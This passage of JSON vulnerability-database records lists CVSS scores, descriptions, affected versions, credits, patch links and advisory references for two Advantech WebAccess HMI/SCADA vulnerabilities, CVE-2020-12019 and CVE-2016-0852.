"Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-20-655" } ], "trust": 0.7 }, "cve": "CVE-2020-12019", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2020-12019", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2020-32232", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "b5fb5c83-6937-4ff7-a6b9-209011280300", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "36d665ec-7a01-4e8b-946b-ff1761ca7bf1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-164655", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2020-12019", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "IPA score", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2020-005320", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2020-12019", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2020-12019", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2020-12019", "trust": 1.0, "value": "CRITICAL" }, { "author": "IPA", "id": "JVNDB-2020-005320", "trust": 0.8, "value": "Critical" }, { "author": "ZDI", "id": "CVE-2020-12019", "trust": 0.7, "value": "HIGH" }, { "author": "ZDI", "id": "CVE-2020-12019", "trust": 0.7, "value": "CRITICAL" }, { "author": "CNVD", "id": "CNVD-2020-32232", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202006-830", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "b5fb5c83-6937-4ff7-a6b9-209011280300", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "36d665ec-7a01-4e8b-946b-ff1761ca7bf1", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-164655", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "b5fb5c83-6937-4ff7-a6b9-209011280300" }, { "db": "IVD", "id": "36d665ec-7a01-4e8b-946b-ff1761ca7bf1" }, { "db": "ZDI", "id": "ZDI-20-655" }, { "db": "ZDI", "id": "ZDI-20-654" }, { "db": "CNVD", "id": "CNVD-2020-32232" }, { "db": "VULHUB", "id": "VHN-164655" }, { "db": "JVNDB", "id": "JVNDB-2020-005320" }, { "db": "CNNVD", "id": "CNNVD-202006-830" }, { "db": "NVD", "id": "CVE-2020-12019" } ] }, "description": { "_id": null, "data": "WebAccess Node Version 8.4.4 and prior is vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute arbitrary code. WebAccess Node Is Advantech Industrial software provided by. The issue results from incorrect permissions set on a resource used by the service. Authentication is not required to exploit this vulnerability.The specific flaw exists within DATACORE.exe. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess browser-based HMI and SCADA software. Advantech WebAccess is a set of browser-based HMI/SCADA software developed by China Taiwan Advantech Company. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2020-12019" }, { "db": "JVNDB", "id": "JVNDB-2020-005320" }, { "db": "ZDI", "id": "ZDI-20-655" }, { "db": "ZDI", "id": "ZDI-20-654" }, { "db": "CNVD", "id": "CNVD-2020-32232" }, { "db": "IVD", "id": "b5fb5c83-6937-4ff7-a6b9-209011280300" }, { "db": "IVD", "id": "36d665ec-7a01-4e8b-946b-ff1761ca7bf1" }, { "db": "VULHUB", "id": "VHN-164655" } ], "trust": 3.87 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2020-12019", "trust": 4.9 }, { "db": "ICS CERT", "id": "ICSA-20-161-01", "trust": 3.1 }, { "db": "CNVD", "id": "CNVD-2020-32232", "trust": 1.1 }, { "db": "CNNVD", "id": "CNNVD-202006-830", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU96784798", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2020-005320", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-10017", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-20-655", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9779", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-20-654", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2020.2012", "trust": 0.6 }, { "db": "NSFOCUS", "id": "47159", "trust": 0.6 }, { "db": "IVD", "id": "B5FB5C83-6937-4FF7-A6B9-209011280300", "trust": 0.2 }, { "db": "IVD", "id": "36D665EC-7A01-4E8B-946B-FF1761CA7BF1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-164655", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "b5fb5c83-6937-4ff7-a6b9-209011280300" }, { "db": "IVD", "id": "36d665ec-7a01-4e8b-946b-ff1761ca7bf1" }, { "db": "ZDI", "id": "ZDI-20-655" }, { "db": "ZDI", "id": "ZDI-20-654" }, { "db": "CNVD", "id": "CNVD-2020-32232" }, { "db": "VULHUB", "id": "VHN-164655" }, { "db": "JVNDB", "id": "JVNDB-2020-005320" }, { "db": "CNNVD", "id": "CNNVD-202006-830" }, { "db": "NVD", "id": "CVE-2020-12019" } ] }, "id": "VAR-202006-0370", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "b5fb5c83-6937-4ff7-a6b9-209011280300" }, { "db": "IVD", "id": "36d665ec-7a01-4e8b-946b-ff1761ca7bf1" }, { "db": "CNVD", "id": "CNVD-2020-32232" }, { "db": "VULHUB", "id": "VHN-164655" } ], "trust": 1.63993413 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "b5fb5c83-6937-4ff7-a6b9-209011280300" }, { "db": "IVD", "id": "36d665ec-7a01-4e8b-946b-ff1761ca7bf1" }, { "db": "CNVD", "id": "CNVD-2020-32232" } ] }, "last_update_date": "2024-11-23T22:21:10.690000Z", "patch": { "_id": null, "data": [ { "title": "Support \u0026 Download", "trust": 0.8, "url": "https://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-MS9MJV\u0026Doc_Source=Download" }, { "title": "Patch for Advantech WebAccess Node buffer overflow vulnerability (CNVD-2020-32232)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/220857" }, { "title": "Advantech WebAccess Node Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=121213" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-32232" }, { "db": "JVNDB", "id": "JVNDB-2020-005320" }, { "db": "CNNVD", "id": "CNNVD-202006-830" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-121", "trust": 1.8 }, { "problemtype": "CWE-787", "trust": 1.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-164655" }, { "db": "JVNDB", "id": "JVNDB-2020-005320" }, { "db": "NVD", "id": "CVE-2020-12019" } ] }, "references": { "_id": null, "data": [ { "trust": 3.1, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-161-01" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12019" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu96784798/" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/47159" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12019" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.2012/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-32232" }, { "db": "VULHUB", "id": "VHN-164655" }, { "db": "JVNDB", "id": "JVNDB-2020-005320" }, { "db": "CNNVD", "id": "CNNVD-202006-830" }, { "db": "NVD", "id": "CVE-2020-12019" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "b5fb5c83-6937-4ff7-a6b9-209011280300", "ident": null }, { "db": "IVD", "id": "36d665ec-7a01-4e8b-946b-ff1761ca7bf1", "ident": null }, { "db": "ZDI", "id": "ZDI-20-655", "ident": null }, { "db": "ZDI", "id": "ZDI-20-654", "ident": null }, { "db": "CNVD", "id": "CNVD-2020-32232", "ident": null }, { "db": "VULHUB", "id": "VHN-164655", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2020-005320", "ident": null }, { "db": "CNNVD", "id": "CNNVD-202006-830", "ident": null }, { "db": "NVD", "id": "CVE-2020-12019", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2020-06-09T00:00:00", "db": "IVD", "id": "b5fb5c83-6937-4ff7-a6b9-209011280300", "ident": null }, { "date": "2020-06-09T00:00:00", "db": "IVD", "id": "36d665ec-7a01-4e8b-946b-ff1761ca7bf1", "ident": null }, { "date": "2020-05-14T00:00:00", "db": "ZDI", "id": "ZDI-20-655", "ident": null }, { "date": "2020-05-14T00:00:00", "db": "ZDI", "id": "ZDI-20-654", "ident": null }, { "date": "2020-06-10T00:00:00", "db": "CNVD", "id": "CNVD-2020-32232", "ident": null }, { "date": "2020-06-15T00:00:00", "db": "VULHUB", "id": "VHN-164655", "ident": null }, { "date": "2020-06-11T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-005320", "ident": null }, { "date": "2020-06-09T00:00:00", "db": "CNNVD", "id": "CNNVD-202006-830", "ident": null }, { "date": "2020-06-15T20:15:11.537000", "db": "NVD", "id": "CVE-2020-12019", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2020-05-14T00:00:00", "db": "ZDI", "id": "ZDI-20-655", "ident": null }, { "date": "2020-05-14T00:00:00", "db": "ZDI", "id": "ZDI-20-654", "ident": null }, { "date": "2020-06-10T00:00:00", "db": "CNVD", "id": "CNVD-2020-32232", "ident": null }, { "date": "2021-09-23T00:00:00", "db": "VULHUB", "id": "VHN-164655", "ident": null }, { "date": "2020-06-11T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-005320", "ident": null }, { "date": "2020-07-16T00:00:00", "db": "CNNVD", "id": "CNNVD-202006-830", "ident": null }, { "date": "2024-11-21T04:59:07.590000", "db": "NVD", "id": "CVE-2020-12019", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202006-830" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech Made WebAccess Node Stack-based buffer overflow vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-005320" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "b5fb5c83-6937-4ff7-a6b9-209011280300" }, { "db": "IVD", "id": "36d665ec-7a01-4e8b-946b-ff1761ca7bf1" }, { "db": "CNNVD", "id": "CNNVD-202006-830" } ], "trust": 1.0 } }
var-201601-0034
Vulnerability from variot
Advantech WebAccess before 8.1 allows remote attackers to bypass an intended administrative requirement and obtain file or folder access via unspecified vectors. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities: 1. A denial-of-service vulnerability 2. An arbitrary file-upload vulnerability 3. A directory-traversal vulnerability 4. Multiple stack-based buffer-overflow vulnerabilities 5. A heap-based buffer overflow vulnerability 6. Multiple buffer-overflow vulnerabilities 7. Multiple information disclosure vulnerabilities 8. A cross-site scripting vulnerability 9. An SQL-injection vulnerability 10. A cross-site request forgery vulnerability 11. A remote-code execution vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences ('../') to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. Advantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0034", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "64d671ec-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00430" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001282" }, { "db": "CNNVD", "id": "CNNVD-201601-325" }, { "db": "NVD", "id": "CVE-2016-0852" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-001282" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ilya Karpov of Positive Technologies, Ivan Sanchez, Andrea Micalizzi, Ariele Caltabiano, Fritz Sands, Steven Seeley, and an anonymous researcher", "sources": [ { "db": "BID", "id": "80745" } ], "trust": 0.3 }, "cve": "CVE-2016-0852", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2016-0852", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CNVD-2016-00430", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "64d671ec-2351-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-88362", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2016-0852", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2016-0852", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2016-0852", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2016-00430", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201601-325", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "64d671ec-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-88362", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "64d671ec-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00430" }, { "db": "VULHUB", "id": "VHN-88362" }, { "db": "JVNDB", "id": "JVNDB-2016-001282" }, { "db": "CNNVD", "id": "CNNVD-201601-325" }, { "db": "NVD", "id": "CVE-2016-0852" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess before 8.1 allows remote attackers to bypass an intended administrative requirement and obtain file or folder access via unspecified vectors. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities:\n1. A denial-of-service vulnerability\n2. An arbitrary file-upload vulnerability\n3. A directory-traversal vulnerability\n4. Multiple stack-based buffer-overflow vulnerabilities\n5. A heap-based buffer overflow vulnerability\n6. Multiple buffer-overflow vulnerabilities\n7. Multiple information disclosure vulnerabilities\n8. A cross-site scripting vulnerability\n9. An SQL-injection vulnerability\n10. A cross-site request forgery vulnerability\n11. A remote-code execution vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences (\u0027../\u0027) to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. \nAdvantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech", "sources": [ { "db": "NVD", "id": "CVE-2016-0852" }, { "db": "JVNDB", "id": "JVNDB-2016-001282" }, { "db": "CNVD", "id": "CNVD-2016-00430" }, { "db": "BID", "id": "80745" }, { "db": "IVD", "id": "64d671ec-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-88362" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-0852", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-16-014-01", "trust": 2.8 }, { "db": "CNNVD", "id": "CNNVD-201601-325", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-00430", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-001282", "trust": 0.8 }, { "db": "BID", "id": "80745", "trust": 0.3 }, { "db": "IVD", "id": "64D671EC-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-88362", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "64d671ec-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00430" }, { "db": "VULHUB", "id": "VHN-88362" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001282" }, { "db": "CNNVD", "id": "CNNVD-201601-325" }, { "db": "NVD", "id": "CVE-2016-0852" } ] }, "id": "VAR-201601-0034", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "64d671ec-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00430" }, { "db": "VULHUB", "id": "VHN-88362" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "64d671ec-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00430" } ] }, "last_update_date": "2024-11-23T21:43:23.705000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech WebAccess security restrictions bypass the patch for the vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70375" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59643" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00430" }, { "db": "JVNDB", "id": "JVNDB-2016-001282" }, { "db": "CNNVD", "id": "CNNVD-201601-325" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-264", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-88362" }, { "db": "JVNDB", "id": "JVNDB-2016-001282" }, { "db": "NVD", "id": "CVE-2016-0852" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-014-01" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0852" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-0852" }, { "trust": 0.6, "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0852" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00430" }, { "db": "VULHUB", "id": "VHN-88362" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001282" }, { "db": "CNNVD", "id": "CNNVD-201601-325" }, { "db": "NVD", "id": "CVE-2016-0852" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "64d671ec-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00430" }, { "db": "VULHUB", "id": "VHN-88362" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001282" }, { "db": "CNNVD", "id": "CNNVD-201601-325" }, { "db": "NVD", "id": "CVE-2016-0852" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "IVD", "id": "64d671ec-2351-11e6-abef-000c29c66e3d" }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00430" }, { "date": "2016-01-15T00:00:00", "db": "VULHUB", "id": "VHN-88362" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-26T00:00:00", 